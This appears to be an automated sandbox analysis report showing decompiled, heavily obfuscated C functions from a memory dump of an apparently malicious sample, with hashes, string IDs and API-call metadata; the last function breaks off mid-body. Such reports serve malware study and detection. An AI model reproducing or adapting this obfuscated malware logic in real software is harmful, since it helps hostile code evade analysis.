                                          					L1:
                                          					_t198 = 0x374e1c43;
                                          					_t182 = 0x15aea868;
                                          					L2:
                                          					while(1) {
                                          						do {
                                          							if(_t223 == 0xa9ba57f) {
                                          								_push(_t198);
                                          								_push(_t198);
                                          								_t199 = 0x38;
                                          								_t222 = E006C8736(_t199);
                                          								__eflags = _t222;
                                          								if(__eflags == 0) {
                                          									_t223 = 0x3a1f14a3;
                                          									_t182 = 0x15aea868;
                                          									_t198 = 0x374e1c43;
                                          									_t218 = 0x28fd42b4;
                                          									goto L19;
                                          								}
                                          								_t223 = 0x2094e6da;
                                          								L15:
                                          								_t182 = 0x15aea868;
                                          								L11:
                                          								_t198 = 0x374e1c43;
                                          								L12:
                                          								_t218 = 0x28fd42b4;
                                          								continue;
                                          							}
                                          							if(_t223 == 0xb1cacb5) {
                                          								return E006CF536(_v36, _v40, _v12, _t222);
                                          							}
                                          							if(_t223 == _t182) {
                                          								 *((intOrPtr*)(_t222 + 0x24)) = _t227;
                                          								_t188 =  *0x6dca24; // 0x0
                                          								 *((intOrPtr*)(_t222 + 0x2c)) = _t188;
                                          								 *0x6dca24 = _t222;
                                          								return _t188;
                                          							}
                                          							if(_t223 == 0x16c9d000) {
                                          								E006D422C(_v68,  *((intOrPtr*)(_t222 + 0x28)), _v72);
                                          								_t223 = 0xb1cacb5;
                                          								goto L15;
                                          							}
                                          							if(_t223 == 0x2094e6da) {
                                          								_push(_v24);
                                          								_t190 = E006D6DB9( *((intOrPtr*)(_t193 + 4)), _t222, _t227, __eflags, _t198,  *_t193, _v76, _v20);
                                          								_t228 =  &(_t228[5]);
                                          								 *((intOrPtr*)(_t222 + 0x28)) = _t190;
                                          								__eflags = _t190;
                                          								_t198 = 0x374e1c43;
                                          								_t182 = 0x15aea868;
                                          								_t223 =  !=  ? 0x374e1c43 : 0xb1cacb5;
                                          								goto L12;
                                          							}
                                          							if(_t223 == _t218) {
                                          								_push(_t198);
                                          								_t191 = E006C1132(_v48, _t198, _v80, _t198, _t222, _v52, _v28, _v32, E006D9586);
                                          								_t228 =  &(_t228[9]);
                                          								 *((intOrPtr*)(_t222 + 0x1c)) = _t191;
                                          								__eflags = _t191;
                                          								_t182 = 0x15aea868;
                                          								_t223 =  !=  ? 0x15aea868 : 0x16c9d000;
                                          								goto L11;
                                          							}
                                          							if(_t223 != _t198) {
                                          								goto L19;
                                          							}
                                          							_t192 = E006C76DB( *((intOrPtr*)(_t222 + 0x28)), _v56, _v60, _v84);
                                          							_t228 =  &(_t228[2]);
                                          							 *((intOrPtr*)(_t222 + 4)) = _t192;
                                          							_t218 = 0x28fd42b4;
                                          							_t223 =  !=  ? 0x28fd42b4 : 0x16c9d000;
                                          							goto L1;
                                          							L19:
                                          							__eflags = _t223 - 0x3a1f14a3;
                                          						} while (__eflags != 0);
                                          						return _t182;
                                          					}
                                          				}
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "=$'&/U$.V$?j$GX$y7X$k<
                                          • API String ID: 0-2482092835
                                          • Opcode ID: 665f55d5710a7f3f819e77403ff5a5da3e373029e71b086fe1736a6c11b96f37
                                          • Instruction ID: f50be755f97ba3387db28804a7c2cb2dbc41a32f1bc22e0116ced8137e34f972
                                          • Opcode Fuzzy Hash: 665f55d5710a7f3f819e77403ff5a5da3e373029e71b086fe1736a6c11b96f37
                                          • Instruction Fuzzy Hash: ACA18572908341AFD358CF25C58A91BFBE2FBD4354F408A1DF48A96260D7B5D90ACF46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E006C1280(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				char _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed int _v92;
                                          				signed int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				signed int _v112;
                                          				signed int _v116;
                                          				signed int _v120;
                                          				signed int _v124;
                                          				signed int _v128;
                                          				void* _t124;
                                          				void* _t136;
                                          				void* _t143;
                                          				signed int _t144;
                                          				signed int _t145;
                                          				signed int _t146;
                                          				void* _t149;
                                          				void* _t170;
                                          				void* _t172;
                                          				void* _t173;
                                          
                                          				_push(_a16);
                                          				_t169 = _a8;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t124);
                                          				_v112 = 0x527a;
                                          				_t173 = _t172 + 0x18;
                                          				_v112 = _v112 + 0x9ab3;
                                          				_t170 = 0;
                                          				_t149 = 0x18640a1d;
                                          				_t144 = 0x56;
                                          				_v112 = _v112 * 0x2c;
                                          				_v112 = _v112 ^ 0x0028d5a0;
                                          				_v84 = 0xce56;
                                          				_v84 = _v84 | 0x89224a79;
                                          				_v84 = _v84 ^ 0x8922db02;
                                          				_v124 = 0x8cd1;
                                          				_v124 = _v124 ^ 0x879587c2;
                                          				_v124 = _v124 | 0xdff4f7f6;
                                          				_v124 = _v124 ^ 0xdff58592;
                                          				_v80 = 0x5082;
                                          				_v80 = _v80 * 5;
                                          				_v80 = _v80 ^ 0x0001dd7a;
                                          				_v100 = 0x94cc;
                                          				_v100 = _v100 >> 1;
                                          				_v100 = _v100 + 0xc5d3;
                                          				_v100 = _v100 ^ 0x0001674a;
                                          				_v104 = 0x7528;
                                          				_v104 = _v104 | 0x4afc80c9;
                                          				_v104 = _v104 * 0x41;
                                          				_v104 = _v104 ^ 0x0a3a6635;
                                          				_v108 = 0x5a30;
                                          				_v108 = _v108 >> 6;
                                          				_t145 = 0x51;
                                          				_v108 = _v108 / _t144;
                                          				_v108 = _v108 ^ 0x00000b43;
                                          				_v128 = 0x7a75;
                                          				_v128 = _v128 ^ 0x183e3e2b;
                                          				_v128 = _v128 >> 0xe;
                                          				_v128 = _v128 << 1;
                                          				_v128 = _v128 ^ 0x0000b567;
                                          				_v88 = 0xd0b6;
                                          				_v88 = _v88 << 2;
                                          				_v88 = _v88 ^ 0x0003606d;
                                          				_v92 = 0x29e5;
                                          				_v92 = _v92 << 0x10;
                                          				_v92 = _v92 ^ 0x29e559c0;
                                          				_v116 = 0xa20c;
                                          				_v116 = _v116 / _t145;
                                          				_v116 = _v116 << 1;
                                          				_v116 = _v116 ^ 0x00003b63;
                                          				_v120 = 0xbe93;
                                          				_v120 = _v120 | 0x1a4ed6db;
                                          				_v120 = _v120 + 0xa009;
                                          				_v120 = _v120 + 0xfffff07c;
                                          				_v120 = _v120 ^ 0x1a4feb5f;
                                          				_v96 = 0x4975;
                                          				_t146 = 0x2b;
                                          				_v96 = _v96 * 0x31;
                                          				_v96 = _v96 / _t146;
                                          				_v96 = _v96 ^ 0x000025f7;
                                          				do {
                                          					while(_t149 != 0x1a9c3b7) {
                                          						if(_t149 == 0xb87d72f) {
                                          							__eflags = E006CB055(_v120, _v96, __eflags,  &_v76, _t169 + 8);
                                          							_t170 =  !=  ? 1 : _t170;
                                          						} else {
                                          							if(_t149 == 0x18640a1d) {
                                          								_t149 = 0x1a19e858;
                                          								continue;
                                          							} else {
                                          								if(_t149 == 0x1a19e858) {
                                          									E006D50F2( &_v76, _v112, _v84, _v124, _a12);
                                          									_t173 = _t173 + 0xc;
                                          									_t149 = 0x1a9c3b7;
                                          									continue;
                                          								} else {
                                          									if(_t149 != 0x2b3c78b1) {
                                          										goto L13;
                                          									} else {
                                          										_t143 = E006D8F11( &_v76, _v128, _v88, _t169 + 4, _v92, _v116);
                                          										_t173 = _t173 + 0x10;
                                          										if(_t143 != 0) {
                                          											_t149 = 0xb87d72f;
                                          											continue;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						L16:
                                          						return _t170;
                                          					}
                                          					_t136 = E006D8F11( &_v76, _v80, _v100, _t169, _v104, _v108);
                                          					_t173 = _t173 + 0x10;
                                          					__eflags = _t136;
                                          					if(__eflags == 0) {
                                          						_t149 = 0x1a747795;
                                          						goto L13;
                                          					} else {
                                          						_t149 = 0x2b3c78b1;
                                          						continue;
                                          					}
                                          					goto L16;
                                          					L13:
                                          					__eflags = _t149 - 0x1a747795;
                                          				} while (__eflags != 0);
                                          				goto L16;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 0Z$5f:$c;$uI$uz$zR
                                          • API String ID: 0-4070947617
                                          • Opcode ID: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
                                          • Instruction ID: 39970c49a210dd50179e8881ebb1ff1cba8162616cdbbeb3edfb401f8dfceded
                                          • Opcode Fuzzy Hash: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
                                          • Instruction Fuzzy Hash: DC616871109341AFD758CF20C98592FBBF2FBC6748F80991DF196862A1D779CA098B47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E006C17AC(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
                                          				char _v4;
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				void* __ecx;
                                          				void* _t124;
                                          				intOrPtr _t144;
                                          				void* _t148;
                                          				signed int _t167;
                                          				signed int _t168;
                                          				signed int _t169;
                                          				signed int _t170;
                                          				void* _t172;
                                          				signed int* _t175;
                                          
                                          				_push(_a20);
                                          				_push(1);
                                          				_push(1);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				E006C602B(_t124);
                                          				_v48 = 0x839b;
                                          				_t175 =  &(( &_v52)[7]);
                                          				_t172 = 0;
                                          				_t148 = 0xc9f1fee;
                                          				_t167 = 0x65;
                                          				_v48 = _v48 / _t167;
                                          				_v48 = _v48 + 0xffff5433;
                                          				_t168 = 0x4c;
                                          				_v48 = _v48 / _t168;
                                          				_v48 = _v48 ^ 0x035e614e;
                                          				_v52 = 0x7a24;
                                          				_t169 = 0x57;
                                          				_v52 = _v52 * 0x3d;
                                          				_v52 = _v52 / _t169;
                                          				_v52 = _v52 | 0x143fc393;
                                          				_v52 = _v52 ^ 0x143ff5ea;
                                          				_v32 = 0x6195;
                                          				_v32 = _v32 ^ 0x160f1dee;
                                          				_v32 = _v32 << 1;
                                          				_v32 = _v32 ^ 0x2c1ed936;
                                          				_v44 = 0xc7f4;
                                          				_v44 = _v44 + 0xffff31e5;
                                          				_v44 = _v44 | 0xcdfc86d8;
                                          				_v44 = _v44 + 0xffff4cbe;
                                          				_v44 = _v44 ^ 0xffff1878;
                                          				_v12 = 0x3e0d;
                                          				_v12 = _v12 << 4;
                                          				_v12 = _v12 ^ 0x0003ab13;
                                          				_v24 = 0xe2a2;
                                          				_t170 = 0x4a;
                                          				_v24 = _v24 * 0x7d;
                                          				_v24 = _v24 >> 4;
                                          				_v24 = _v24 ^ 0x0006fa2b;
                                          				_v16 = 0xd6eb;
                                          				_v16 = _v16 >> 0xb;
                                          				_v16 = _v16 ^ 0x0000394e;
                                          				_v40 = 0x5ece;
                                          				_v40 = _v40 * 0x43;
                                          				_v40 = _v40 / _t170;
                                          				_v40 = _v40 >> 0xe;
                                          				_v40 = _v40 ^ 0x000003d1;
                                          				_v28 = 0xdfec;
                                          				_v28 = _v28 >> 6;
                                          				_v28 = _v28 << 0xb;
                                          				_v28 = _v28 ^ 0x001be0b4;
                                          				_v20 = 0x73b;
                                          				_v20 = _v20 ^ 0xd6615083;
                                          				_v20 = _v20 ^ 0xd6610707;
                                          				_v36 = 0x46b8;
                                          				_v36 = _v36 | 0xf1966772;
                                          				_v36 = _v36 ^ 0x374c3a36;
                                          				_v36 = _v36 * 0x27;
                                          				_v36 = _v36 ^ 0x4b440184;
                                          				_v8 = 0xd697;
                                          				_v8 = _v8 ^ 0x6f8084df;
                                          				_v8 = _v8 ^ 0x6f807f26;
                                          				_t171 = _v4;
                                          				while(_t148 != 0x24e4c4b) {
                                          					if(_t148 == 0xc9f1fee) {
                                          						_t148 = 0x3ad8e818;
                                          						continue;
                                          					} else {
                                          						if(_t148 == 0x1ffca7a2) {
                                          							E006D1AB6(1, _v12, _t148, _a20, 1, _v24, _v16, _v4, _a4, _v40, _v28, _v20);
                                          							_t175 =  &(_t175[0xa]);
                                          							_t148 = 0x24e4c4b;
                                          							_t172 =  !=  ? 1 : _t172;
                                          							continue;
                                          						} else {
                                          							if(_t148 == 0x34494570) {
                                          								if(E006D0729(_v32,  &_v4, _v44, _t171) != 0) {
                                          									_t148 = 0x1ffca7a2;
                                          									continue;
                                          								}
                                          							} else {
                                          								if(_t148 != 0x3ad8e818) {
                                          									L13:
                                          									if(_t148 != 0x2a0664e6) {
                                          										continue;
                                          									}
                                          								} else {
                                          									_t144 = E006CF6DF(_t148);
                                          									_t171 = _t144;
                                          									if(_t144 != 0xffffffff) {
                                          										_t148 = 0x34494570;
                                          										continue;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          					return _t172;
                                          				}
                                          				E006D4F7D(_v36, _v8, _v4);
                                          				_t148 = 0x2a0664e6;
                                          				goto L13;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: >$$z$6:L7$N9$pEI4$pEI4
                                          • API String ID: 0-302225334
                                          • Opcode ID: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
                                          • Instruction ID: 643e34a11e3fce6f0693865e3b8b43bcac09d6585a6b33cc2ccae8c479fa81f5
                                          • Opcode Fuzzy Hash: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
                                          • Instruction Fuzzy Hash: D96153715083419FD358CF65D88591FBBE2FBC6358F404A1EF1969A260C3B5CA4A8F87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006D20C5() {
                                          				char _v524;
                                          				signed int _v528;
                                          				signed int _v532;
                                          				intOrPtr _v536;
                                          				signed int _v540;
                                          				signed int _v544;
                                          				signed int _v548;
                                          				signed int _v552;
                                          				signed int _v556;
                                          				signed int _v560;
                                          				signed int _v564;
                                          				signed int _v568;
                                          				signed int _v572;
                                          				signed int _v576;
                                          				signed int _v580;
                                          				signed int _v584;
                                          				signed int _v588;
                                          				signed int _v592;
                                          				void* _t124;
                                          				short* _t127;
                                          				void* _t132;
                                          				void* _t134;
                                          				intOrPtr _t150;
                                          				signed int _t159;
                                          				signed int _t160;
                                          				signed int _t161;
                                          				signed int _t167;
                                          				void* _t169;
                                          
                                          				_t169 = (_t167 & 0xfffffff8) - 0x250;
                                          				_v532 = _v532 & 0x00000000;
                                          				_v528 = _v528 & 0x00000000;
                                          				_t132 = 0x3ec8c14;
                                          				_v536 = 0x37230;
                                          				_v544 = 0xcdd0;
                                          				_v544 = _v544 >> 7;
                                          				_v544 = _v544 ^ 0x000074a7;
                                          				_v572 = 0xb951;
                                          				_v572 = _v572 + 0xffffa9df;
                                          				_v572 = _v572 ^ 0x00005eca;
                                          				_v584 = 0x3783;
                                          				_v584 = _v584 >> 1;
                                          				_t159 = 0x30;
                                          				_v584 = _v584 / _t159;
                                          				_v584 = _v584 ^ 0x00007df0;
                                          				_v592 = 0x764f;
                                          				_t160 = 0x29;
                                          				_v592 = _v592 * 0x6c;
                                          				_v592 = _v592 + 0xffff1483;
                                          				_v592 = _v592 ^ 0x0030effe;
                                          				_v580 = 0x26e4;
                                          				_v580 = _v580 + 0xffffa17d;
                                          				_v580 = _v580 >> 0xc;
                                          				_v580 = _v580 ^ 0x000fb6a3;
                                          				_v588 = 0x592d;
                                          				_v588 = _v588 * 0x5e;
                                          				_v588 = _v588 + 0xfffff058;
                                          				_v588 = _v588 ^ 0x0020c0b6;
                                          				_v576 = 0x67c6;
                                          				_v576 = _v576 >> 4;
                                          				_v576 = _v576 | 0x70f0481f;
                                          				_v576 = _v576 ^ 0x70f020ed;
                                          				_v568 = 0x5c9a;
                                          				_v568 = _v568 ^ 0x6d262440;
                                          				_v568 = _v568 ^ 0x6d2624e4;
                                          				_v552 = 0x512d;
                                          				_v552 = _v552 / _t160;
                                          				_v552 = _v552 ^ 0x00002fd7;
                                          				_v540 = 0x67a3;
                                          				_v540 = _v540 + 0x741c;
                                          				_v540 = _v540 ^ 0x0000c39d;
                                          				_v560 = 0xac4b;
                                          				_v560 = _v560 | 0x611015d1;
                                          				_v560 = _v560 ^ 0x6110f087;
                                          				_v548 = 0xff97;
                                          				_v548 = _v548 >> 8;
                                          				_v548 = _v548 ^ 0x000016db;
                                          				_v556 = 0xce04;
                                          				_t161 = 0x2b;
                                          				_v556 = _v556 / _t161;
                                          				_v556 = _v556 ^ 0x000048b5;
                                          				_v564 = 0x85d6;
                                          				_v564 = _v564 >> 0xf;
                                          				_v564 = _v564 ^ 0x00007642;
                                          				do {
                                          					while(_t132 != 0x3ec8c14) {
                                          						if(_t132 == 0x4e3e716) {
                                          							_push(_v572);
                                          							_t124 = E006D889D(0x6dc9b0, _v544, __eflags);
                                          							_pop(_t134);
                                          							_t150 =  *0x6dca2c; // 0x248300
                                          							_t108 = _t150 + 0x230; // 0x710050
                                          							E006CC680(_t108, _v592, _v580, _t134, _v588,  *0x6dca2c, _t124,  &_v524);
                                          							_t169 = _t169 + 0x1c;
                                          							_t127 = E006D2025(_v576, _t124, _v568, _v552);
                                          							_t132 = 0x36d909ae;
                                          							continue;
                                          						} else {
                                          							if(_t132 == 0x2942dba3) {
                                          								_t127 = E006D2B16(_v548,  &_v524, E006D84CC, _v564, 0,  &_v524);
                                          							} else {
                                          								if(_t132 != 0x36d909ae) {
                                          									goto L8;
                                          								} else {
                                          									_t127 = E006C28CE( &_v524, _v540, _v560);
                                          									 *_t127 = 0;
                                          									_t132 = 0x2942dba3;
                                          									continue;
                                          								}
                                          							}
                                          						}
                                          						L11:
                                          						return _t127;
                                          					}
                                          					_t132 = 0x4e3e716;
                                          					L8:
                                          					__eflags = _t132 - 0x16e8989b;
                                          				} while (__eflags != 0);
                                          				goto L11;
                                          			}
































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: -Q$-Y$Bv$Ov$$&m$&
                                          • API String ID: 0-2434786051
                                          • Opcode ID: ed0434062c272fe6a20eeeabe32c8b9785f02845526023ff46fd027a6967627f
                                          • Instruction ID: 2d8f298ec2e3d42f9a9dd74af5c567314dbdbc73743bb3a380c1f549a8d8e7b3
                                          • Opcode Fuzzy Hash: ed0434062c272fe6a20eeeabe32c8b9785f02845526023ff46fd027a6967627f
                                          • Instruction Fuzzy Hash: E35189715083419FD368DF21C88A91BBBF2FBD4328F505A1EF585462A0C7B58949CF87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
                                          • CoTaskMemAlloc.OLE32(?), ref: 10002227
                                          • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
                                          • StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
                                          • CoTaskMemFree.OLE32(00000000), ref: 1000227A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: BinaryCryptStringTask$AllocDeserializeFreePropVariant
                                          • String ID:
                                          • API String ID: 2967290590-0
                                          • Opcode ID: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
                                          • Instruction ID: 3bbe9fb0322c03d3a19eaaaaa04faf6b757ff22615bcfcbc1accf4c01beb8128
                                          • Opcode Fuzzy Hash: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
                                          • Instruction Fuzzy Hash: 51116D3AA01129BBEB10DBD48C44FDE77FCDB457A1F010266FE05E2154DA719A408AA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E006C6754(intOrPtr __ecx, intOrPtr* __edx) {
                                          				char _v520;
                                          				signed int _v524;
                                          				intOrPtr _v528;
                                          				intOrPtr _v532;
                                          				unsigned int _v536;
                                          				signed int _v540;
                                          				signed int _v544;
                                          				signed int _v548;
                                          				signed int _v552;
                                          				signed int _v556;
                                          				signed int _v560;
                                          				signed int _v564;
                                          				signed int _v568;
                                          				signed int _v572;
                                          				void* _t96;
                                          				signed int _t97;
                                          				signed int _t101;
                                          				intOrPtr _t104;
                                          				signed int _t106;
                                          				signed int _t107;
                                          				void* _t108;
                                          				signed int _t123;
                                          				void* _t124;
                                          				intOrPtr* _t128;
                                          				signed int* _t129;
                                          
                                          				_t129 =  &_v572;
                                          				_v524 = _v524 & 0x00000000;
                                          				_v532 = 0x37527f;
                                          				_v528 = 0x4295e6;
                                          				_v536 = 0xee22;
                                          				_v536 = _v536 >> 0xc;
                                          				_v536 = _v536 ^ 0x00007a3a;
                                          				_v544 = 0x8f72;
                                          				_v544 = _v544 | 0xa1a2610a;
                                          				_v544 = _v544 ^ 0xa1a2ad19;
                                          				_v540 = 0xc65b;
                                          				_v540 = _v540 << 9;
                                          				_v540 = _v540 ^ 0x018ca8d5;
                                          				_v572 = 0x4354;
                                          				_v572 = _v572 << 0xd;
                                          				_v572 = _v572 + 0xffff6940;
                                          				_v572 = _v572 * 0x52;
                                          				_t128 = __edx;
                                          				_v572 = _v572 ^ 0xb1ecefd2;
                                          				_v552 = 0x7a0c;
                                          				_t104 = __ecx;
                                          				_v552 = _v552 | 0xfffddbf7;
                                          				_t124 = 0x1663684c;
                                          				_v552 = _v552 ^ 0xfffd8a47;
                                          				_v568 = 0x9348;
                                          				_t106 = 0xf;
                                          				_v568 = _v568 * 0x32;
                                          				_v568 = _v568 + 0x92e3;
                                          				_v568 = _v568 * 0x69;
                                          				_v568 = _v568 ^ 0x0c08d7a0;
                                          				_v556 = 0x9f50;
                                          				_v556 = _v556 / _t106;
                                          				_v556 = _v556 >> 2;
                                          				_v556 = _v556 ^ 0x000022d0;
                                          				_v548 = 0xa3e1;
                                          				_v548 = _v548 >> 0xd;
                                          				_v548 = _v548 ^ 0x000031bd;
                                          				_v564 = 0x55b6;
                                          				_v564 = _v564 >> 1;
                                          				_v564 = _v564 + 0xaf4f;
                                          				_t107 = 0x5e;
                                          				_t123 = _v548;
                                          				_v564 = _v564 / _t107;
                                          				_v564 = _v564 ^ 0x0000417a;
                                          				_v560 = 0xe775;
                                          				_v560 = _v560 << 4;
                                          				_v560 = _v560 << 0xd;
                                          				_v560 = _v560 ^ 0xceea6264;
                                          				do {
                                          					while(_t124 != 0x32e36bf) {
                                          						if(_t124 == 0xcc4ee6e) {
                                          							 *((intOrPtr*)(_t123 + 0x24)) = _t104;
                                          							_t97 =  *0x6dca24; // 0x0
                                          							 *(_t123 + 0x2c) = _t97;
                                          							 *0x6dca24 = _t123;
                                          							return _t97;
                                          						}
                                          						if(_t124 != 0x1663684c) {
                                          							if(_t124 == 0x2308bbf2) {
                                          								return E006CF536(_v548, _v564, _v560, _t123);
                                          							}
                                          							if(_t124 != 0x242d3c72) {
                                          								goto L12;
                                          							} else {
                                          								_push( &_v520);
                                          								_t101 = E006C88E5(_t104, _t128);
                                          								asm("sbb esi, esi");
                                          								_t107 = 0x6dc910;
                                          								_t124 = ( ~_t101 & 0xe0257acd) + 0x2308bbf2;
                                          								continue;
                                          							}
                                          							L16:
                                          							return _t101;
                                          						}
                                          						_push(_t107);
                                          						_t108 = 0x38;
                                          						_t101 = E006C8736(_t108);
                                          						_t123 = _t101;
                                          						_t107 = _t107;
                                          						if(_t123 != 0) {
                                          							_t124 = 0x242d3c72;
                                          							continue;
                                          						}
                                          						goto L16;
                                          					}
                                          					_push(_t107);
                                          					_push(_v556);
                                          					_push( &_v520);
                                          					_push(_v568);
                                          					_push(0);
                                          					_push(_v552);
                                          					_t107 = _v572;
                                          					_push(0);
                                          					_t96 = E006C568E(_t107, 0);
                                          					_t129 =  &(_t129[7]);
                                          					if(_t96 == 0) {
                                          						_t124 = 0x2308bbf2;
                                          						goto L12;
                                          					} else {
                                          						_t124 = 0xcc4ee6e;
                                          						continue;
                                          					}
                                          					goto L16;
                                          					L12:
                                          				} while (_t124 != 0x2bbec955);
                                          				return _t101;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: :z$r<-$$r<-$$u$zA
                                          • API String ID: 0-4189644680
                                          • Opcode ID: 32e583c5a317fbc1aee2bb86e34ba3dcca7b639e5a7f033bb56dc5a1f8d4b376
                                          • Instruction ID: 77a798d94479085277e98ea994d3281d3297b89260d2564226bea1c5ac131ddf
                                          • Opcode Fuzzy Hash: 32e583c5a317fbc1aee2bb86e34ba3dcca7b639e5a7f033bb56dc5a1f8d4b376
                                          • Instruction Fuzzy Hash: A0518A715083029FD318CF26C449A2BBBE1EBC8758F044A1DF4D9A72A0D7749A09CF86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 98%
                                          			E006C839D(void* __ecx, void* __edi) {
                                          				char _v4;
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				int _t181;
                                          				signed int _t184;
                                          				signed int _t186;
                                          				signed int _t187;
                                          				signed int _t188;
                                          				signed int _t189;
                                          				signed int _t194;
                                          				void* _t211;
                                          				void* _t215;
                                          				signed int _t217;
                                          
                                          				_v28 = 0x5ca2;
                                          				_v28 = _v28 + 0x82ee;
                                          				_v28 = _v28 << 0xb;
                                          				_v28 = _v28 ^ 0x06fc8008;
                                          				_v52 = 0x31f1;
                                          				_v52 = _v52 * 0x4e;
                                          				_t215 = __ecx;
                                          				_t186 = 0x39;
                                          				_v52 = _v52 * 0x4d;
                                          				_v52 = _v52 >> 7;
                                          				_v52 = _v52 ^ 0x00092748;
                                          				_v20 = 0x7fc5;
                                          				_v20 = _v20 * 0x6b;
                                          				_v20 = _v20 << 2;
                                          				_v20 = _v20 ^ 0x00d59d54;
                                          				_v44 = 0xb39b;
                                          				_v44 = _v44 + 0xf7d;
                                          				_v44 = _v44 | 0x2a7b5142;
                                          				_v44 = _v44 + 0xffff17c4;
                                          				_v44 = _v44 ^ 0x2a7aeb0e;
                                          				_v60 = 0x1587;
                                          				_v60 = _v60 | 0x5979cfaa;
                                          				_v60 = _v60 ^ 0xb2ac8491;
                                          				_v60 = _v60 ^ 0x62b96002;
                                          				_v60 = _v60 ^ 0x896c4508;
                                          				_v16 = 0x3e7;
                                          				_v16 = _v16 | 0x10c95731;
                                          				_v16 = _v16 ^ 0x10c93485;
                                          				_v56 = 0x1ea8;
                                          				_v56 = _v56 << 4;
                                          				_v56 = _v56 << 6;
                                          				_v56 = _v56 / _t186;
                                          				_v56 = _v56 ^ 0x0002353c;
                                          				_v12 = 0x5bc0;
                                          				_t187 = 0x13;
                                          				_v12 = _v12 / _t187;
                                          				_v12 = _v12 ^ 0x00001b6c;
                                          				_v48 = 0x8f53;
                                          				_v48 = _v48 ^ 0x72e3c217;
                                          				_v48 = _v48 >> 0xb;
                                          				_v48 = _v48 ^ 0x701cd0a1;
                                          				_v48 = _v48 ^ 0x7012c214;
                                          				_v24 = 0xa180;
                                          				_v24 = _v24 | 0x7584ea2b;
                                          				_v24 = _v24 + 0x36fb;
